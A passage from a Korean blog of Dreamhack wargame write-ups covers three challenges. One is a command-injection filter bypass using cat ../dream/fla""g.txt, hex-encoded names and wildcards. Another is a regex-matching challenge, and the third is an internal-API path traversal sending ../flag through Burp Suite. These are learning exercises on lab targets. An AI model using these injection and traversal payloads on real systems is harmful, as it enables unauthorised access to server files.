  echo "</pre>";
}

먼저 pwd 명령을 통해 현재 디렉토리를 파악할 수 있었다.

cd .. && ls 명령을 통해 이전 디렉토리를 확인해보면, 우리가 찾고자 하는 dream 디렉토리가 위치하고 있다.

flag 필터링을 어떻게 우회 할것인가?

구글링을 했을때, 대다수의 블로그가 웹사이트 취약점에 대해서 다루고 있었는데 이 문제의 경우 리눅스 커맨드라인에 입력해야 하기 때문에 애를 많이 먹었다.

실패한 목록들
- 대문자로 바꾸기 → 우리가 우회하려는 preg_match()함수에서 /i 플래그를 통해 이를 막아두었다.
- cd ../dream && cat "$(printf '\x66\x6c\x61\x67').txt"
- cat /var/dream/"$(printf '\\x66\\x6c\\x61\\x67').txt"
  → 애초에 printf '\x66\x6c\x61\x67' 명령이 안먹히는 환경이다.

많은 삽질을 하다가 cat ../dream/fla""g.txt을 통해 풀어냈다.
preg_match('/flag/i', $input)은 "flag"라는 연속된 문자열을 찾기 때문에 이렇게 끊어주는 것 만으로도 간단하게 우회가 가능하다.

그러면 아무 문자로 끊으면 될까?
"로 끊을수 있었던 이유도 따로 있다.

셸(shell)에서 fla""g.txt는 완벽하게 붙여진 flag.txt로 인식한다.
PHP 코드 내에서는 "fla" + 빈 문자열 "" + "g"를 붙여서 "flag"가 되는 형태이다.

그러나, 정규식에서는 문자열이 붙여진다고 이해하지 못하고 이를 각각의 문자열로 인식한다. 따라서 우회가 가능한 것이다.

결론적으로 플래그를 얻어낼 수 있었다.

[참고할 자료]

문제를 풀고 나서 다른 분이 푼 풀이를 보다가 내가 어렵게 푼 편이라는 것을 깨달았다.
따라서 더 쉽게 푸신 분들의 풀이를 함께 언급한다.

파일 이름인 flag를 직접 작성하지 않고서도 내용 출력이 가능
https://taesan-smj.tistory.com/61
이럴때는
을 이용하면 된다.
의 의미는 해당 파일 내부에서 모든 파일을 가져오라는 의미이므로cat ../dream/*.txt 를 입력하게 된다면, txt 확장자를 가지고 있는 경로에 있는 파일을 읽어오라는 뜻이다.

파일 이름의 일부만 입력해도 접근이 가능
https://koharinn.tistory.com/701
파일 이름의 일부를 * 처리해도 패턴에 매칭되는 파일이 있다면 접근이 가능하다.

[Dreamhack] wargame 'ex-reg-ex' write-up

eunee22 — Sun, 7 Sep 2025 23:09:36 +0900

Biginner
문제링크
문제에서 요구하는 형식의 문자열을 입력하여 플래그를 획득하세요.
플래그는 flag.txt 파일과 FLAG 변수에 있습니다.
플래그 형식은 DH{...} 입니다.

문제 파악

주어진 정규표현식에 부합하는 값을 입력하면 flag를 얻을 수 있다.

@app.route("/", methods = ["GET", "POST"])
def index():
    input_val = ""
    if request.method == "POST":
        input_val = request.form.get("input_val", "")
        m = re.match(r'dr\w{5,7}e\d+am@[a-z]{3,7}\.\w+', input_val)
        if m:
            return render_template("index.html", pre_txt=input_val, flag=FLAG)
    return render_template("index.html", pre_txt=input_val, flag='?')

문제 풀이

주어진 정규표현식은 아래와 같다

r'dr\w{5,7}e\d+am@[a-z]{3,7}\.\w+'

dr: "dr"로 시작
\w{5,7}: 5~7개의 알파벳, 숫자, 또는 밑줄(_)
e: "e"가 와야함
\d+: 하나 이상의 숫자
am: "am"이 와야함
@: "@" 기호가 와야함
[a-z]{3,7}: 3~7개의 소문자 알파벳
.: "." (점)이 와야함
\w+: 하나 이상의 알파벳, 숫자, 또는 밑줄(_)

나는 위 조건에 부합하는 임의의 값을 작성했다.

dr1234_e2am@naver.com

입력하면 손쉽게 flag를 얻을 수 있다.

[Dreamhack] wargame 'pathtraversal' write-up

eunee22 — Sun, 7 Sep 2025 22:59:39 +0900

Biginner
문제링크
사용자의 정보를 조회하는 API 서버입니다.
Path Traversal 취약점을 이용해 /api/flag 에 있는 플래그를 획득하세요!

문제 파악

문제 이름이 pathtraversal인 만큼 해당 개념에 대해서 짚고 넘어가야 한다.

Path Traversal

이 개념은 앞선 file-download-1 문제에서도 다뤘던 개념이다.
url path 조작을 통해서 server 파일 시스템 내부를 이리저리 돌아다니는것이 핵심이다.

파일 다운로드 취약점 공격 유형 예시

문제 풀이로 다시 돌아가서,

주어진 웹사이트에 접속해서 /get_info로 들어가면 유저 정보가 나온다.
userid를 입력하여 submit 하는 부분이 있으므로 이를 이용할 수 있을것 같다.

코드를 확인해 보면 view 버튼을 눌러 사용자 입력이 전송되는 순간 request는 /api/user 디렉토리로 들어간다.
우리의 목표는 /api/flag 이므로 구체적으로 어디로 이동해야할지 나와있는 셈이다.

@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
    if request.method == 'GET':
        return render_template('get_info.html')
    elif request.method == 'POST':
        userid = request.form.get('userid', '')
        info = requests.get(f'{API_HOST}/api/user/{userid}').text
        return render_template('get_info.html', info=info)

문제 풀이

요청을 보내는 코드를 자세히 살펴보면

info = requests.get(f'{API_HOST}/api/user/{userid}').text

userid는 단순히 문자열처럼 보이지만, 실제로는 내부 API 주소에 붙어서 요청이 전송되는 구조이다. 즉, 사용자가 입력한 값은 서버가 구성한 URL의 일부로 사용되며, 이는 곧 Flask에서 정의한 라우트(@app.route)에 정확히 일치해야 응답을 받을 수 있다는 뜻이다.

쉽게 말해서 서버가 입력값을 파일 시스템 경로처럼 해석하는게 아니라 HTTP URL 경로로 처리하기에 cd .. ..등을 넣어도 경로탈출이 어렵다. 제목이 path traversal이라서 가장 헷갈렸던 점이라 적어둔다.

이 웹사이트는 사용자가 값을 입력하면, 서버는 그 값을 내부 주소로 요청을 보내고, 그 결과를 받아서 사용자에게 그대로 보여주는 방식으로 작동한다.

따라서 Burp Suite를 통해 이 요청을 가로채 보면,
우리가 입력한 값이 실제로 서버 내부의 어떤 주소로 붙는지 확인할 수 있고, 이 부분을 조작해서 원래는 접근할 수 없는 경로로 서버 스스로 요청을 보내게 유도할 수 있다.

먼저 Burp Suite에서 Proxy → Intercept off → Open brower → 브라우저가 뜨면 VM으로 제공받은 링크 입력
POST요청까지 안가고 GET에서 멈춰있을때 Send to Repeater
body에 숨겨진 파라미터인 userid발견
- 이제 userid에 pathtraversal을 위한 ../flag를 입력하고 send하면 응답으로 flag를 받을 수 있다.

* 참고문헌

[파일 다운로드 취약점]

https://velog.io/@jungwoo343/%ED%8C%8C%EC%9D%BC-%EB%8B%A4%EC%9A%B4%EB%A1%9C%EB%93%9C-%EC%B7%A8%EC%95%BD%EC%A0%90